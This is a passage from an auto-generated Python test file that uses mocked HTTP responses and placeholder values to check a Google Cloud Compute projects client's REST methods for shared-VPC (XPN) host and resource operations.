with pytest.raises(ValueError):
client.disable_xpn_host_unary(
compute.DisableXpnHostProjectRequest(), project="project_value",
)
def test_disable_xpn_host_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.DisableXpnResourceProjectRequest, dict,]
)
def test_disable_xpn_resource_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_disable_xpn_resource_request_resource"] = {
"xpn_resource": {"id": "id_value", "type_": "type__value"}
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.disable_xpn_resource_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_disable_xpn_resource_unary_rest_required_fields(
request_type=compute.DisableXpnResourceProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).disable_xpn_resource._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).disable_xpn_resource._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.disable_xpn_resource_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_disable_xpn_resource_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.disable_xpn_resource._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",))
& set(("project", "projectsDisableXpnResourceRequestResource",))
)
def test_disable_xpn_resource_unary_rest_bad_request(
transport: str = "rest", request_type=compute.DisableXpnResourceProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_disable_xpn_resource_request_resource"] = {
"xpn_resource": {"id": "id_value", "type_": "type__value"}
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.disable_xpn_resource_unary(request)
def test_disable_xpn_resource_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
projects_disable_xpn_resource_request_resource=compute.ProjectsDisableXpnResourceRequest(
xpn_resource=compute.XpnResourceId(id="id_value")
),
)
mock_args.update(sample_request)
client.disable_xpn_resource_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/disableXpnResource"
% client.transport._host,
args[1],
)
def test_disable_xpn_resource_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.disable_xpn_resource_unary(
compute.DisableXpnResourceProjectRequest(),
project="project_value",
projects_disable_xpn_resource_request_resource=compute.ProjectsDisableXpnResourceRequest(
xpn_resource=compute.XpnResourceId(id="id_value")
),
)
def test_disable_xpn_resource_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.EnableXpnHostProjectRequest, dict,])
def test_enable_xpn_host_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.enable_xpn_host_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_enable_xpn_host_unary_rest_required_fields(
request_type=compute.EnableXpnHostProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).enable_xpn_host._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).enable_xpn_host._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.enable_xpn_host_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_enable_xpn_host_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.enable_xpn_host._get_unset_required_fields({})
assert set(unset_fields) == (set(("requestId",)) & set(("project",)))
def test_enable_xpn_host_unary_rest_bad_request(
transport: str = "rest", request_type=compute.EnableXpnHostProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.enable_xpn_host_unary(request)
def test_enable_xpn_host_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
client.enable_xpn_host_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/enableXpnHost"
% client.transport._host,
args[1],
)
def test_enable_xpn_host_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.enable_xpn_host_unary(
compute.EnableXpnHostProjectRequest(), project="project_value",
)
def test_enable_xpn_host_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.EnableXpnResourceProjectRequest, dict,]
)
def test_enable_xpn_resource_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_enable_xpn_resource_request_resource"] = {
"xpn_resource": {"id": "id_value", "type_": "type__value"}
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.enable_xpn_resource_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_enable_xpn_resource_unary_rest_required_fields(
request_type=compute.EnableXpnResourceProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).enable_xpn_resource._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).enable_xpn_resource._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.enable_xpn_resource_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_enable_xpn_resource_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.enable_xpn_resource._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",))
& set(("project", "projectsEnableXpnResourceRequestResource",))
)
def test_enable_xpn_resource_unary_rest_bad_request(
transport: str = "rest", request_type=compute.EnableXpnResourceProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_enable_xpn_resource_request_resource"] = {
"xpn_resource": {"id": "id_value", "type_": "type__value"}
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.enable_xpn_resource_unary(request)
def test_enable_xpn_resource_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
projects_enable_xpn_resource_request_resource=compute.ProjectsEnableXpnResourceRequest(
xpn_resource=compute.XpnResourceId(id="id_value")
),
)
mock_args.update(sample_request)
client.enable_xpn_resource_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/enableXpnResource"
% client.transport._host,
args[1],
)
def test_enable_xpn_resource_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.enable_xpn_resource_unary(
compute.EnableXpnResourceProjectRequest(),
project="project_value",
projects_enable_xpn_resource_request_resource=compute.ProjectsEnableXpnResourceRequest(
xpn_resource=compute.XpnResourceId(id="id_value")
),
)
def test_enable_xpn_resource_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.GetProjectRequest, dict,])
def test_get_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Project(
creation_timestamp="creation_timestamp_value",
default_network_tier="default_network_tier_value",
default_service_account="default_service_account_value",
description="description_value",
enabled_features=["enabled_features_value"],
id=205,
kind="kind_value",
name="name_value",
self_link="self_link_value",
xpn_project_status="xpn_project_status_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Project)
assert response.creation_timestamp == "creation_timestamp_value"
assert response.default_network_tier == "default_network_tier_value"
assert response.default_service_account == "default_service_account_value"
assert response.description == "description_value"
assert response.enabled_features == ["enabled_features_value"]
assert response.id == 205
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.self_link == "self_link_value"
assert response.xpn_project_status == "xpn_project_status_value"
def test_get_rest_required_fields(request_type=compute.GetProjectRequest):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Project()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_get_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.get._get_unset_required_fields({})
assert set(unset_fields) == (set(()) & set(("project",)))
def test_get_rest_bad_request(
transport: str = "rest", request_type=compute.GetProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get(request)
def test_get_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Project()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
client.get(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}" % client.transport._host, args[1]
)
def test_get_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetProjectRequest(), project="project_value",
)
def test_get_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.GetXpnHostProjectRequest, dict,])
def test_get_xpn_host_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Project(
creation_timestamp="creation_timestamp_value",
default_network_tier="default_network_tier_value",
default_service_account="default_service_account_value",
description="description_value",
enabled_features=["enabled_features_value"],
id=205,
kind="kind_value",
name="name_value",
self_link="self_link_value",
xpn_project_status="xpn_project_status_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_xpn_host(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Project)
assert response.creation_timestamp == "creation_timestamp_value"
assert response.default_network_tier == "default_network_tier_value"
assert response.default_service_account == "default_service_account_value"
assert response.description == "description_value"
assert response.enabled_features == ["enabled_features_value"]
assert response.id == 205
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.self_link == "self_link_value"
assert response.xpn_project_status == "xpn_project_status_value"
def test_get_xpn_host_rest_required_fields(
request_type=compute.GetXpnHostProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get_xpn_host._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get_xpn_host._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Project()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_xpn_host(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_get_xpn_host_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.get_xpn_host._get_unset_required_fields({})
assert set(unset_fields) == (set(()) & set(("project",)))
def test_get_xpn_host_rest_bad_request(
transport: str = "rest", request_type=compute.GetXpnHostProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get_xpn_host(request)
def test_get_xpn_host_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Project()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Project.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
client.get_xpn_host(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/getXpnHost"
% client.transport._host,
args[1],
)
def test_get_xpn_host_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_xpn_host(
compute.GetXpnHostProjectRequest(), project="project_value",
)
def test_get_xpn_host_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.GetXpnResourcesProjectsRequest, dict,]
)
def test_get_xpn_resources_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ProjectsGetXpnResources(
kind="kind_value", next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_xpn_resources(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.GetXpnResourcesPager)
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
def test_get_xpn_resources_rest_required_fields(
request_type=compute.GetXpnResourcesProjectsRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get_xpn_resources._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).get_xpn_resources._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
("max_results", "filter", "order_by", "page_token", "return_partial_success",)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
